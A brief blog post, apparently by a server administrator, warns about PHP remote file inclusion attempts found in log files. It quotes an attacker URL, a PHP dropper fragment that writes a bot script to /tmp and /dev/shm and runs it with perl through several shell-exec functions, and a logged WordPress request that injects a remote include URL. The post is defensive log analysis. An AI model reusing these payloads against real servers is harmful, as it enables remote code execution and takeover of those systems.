more php exploit attempts

look for this “http://sslsystem.webpark.pl/center/base?” in your logfiles as some idiots try to run a variety of commands on targeted systems.

cf(“/tmp/.temp_04128”,$bot);
chdir(“/tmp”);
system(“perl /tmp/.temp_04128”);
passthru(“perl /tmp/.temp_04128”);
exec(“perl /tmp/.temp_04128”);
shell_exec(“perl /tmp/.temp_04128”);
@unlink(“/tmp/.temp_04128”);
cf(“/dev/.temp_04128”,$bot);
chdir(“/dev”);
system(“perl /dev/shm/.temp_04128”);
passthru(“perl /dev/shm/.temp_04128”);
exec(“perl /dev/shm/.temp_04128”);
shell_exec(“perl /dev/shm/.temp_04128”);
@unlink(“/dev/.temp_04128”);

there’s a thread here that mentions it, but I’m not sure it’s the same thing. The tech support folks don’t exactly show lot of enthusiasm for finding out what’s happening. I mean, no one should be passing shell commands for things that live in /tmp

and more:

GET /wordpress/index.php//index.php?template=http://usuarios.arnet.com.ar/larry123/safe.txt?

Leave a Reply

Your email address will not be published. Required fields are marked *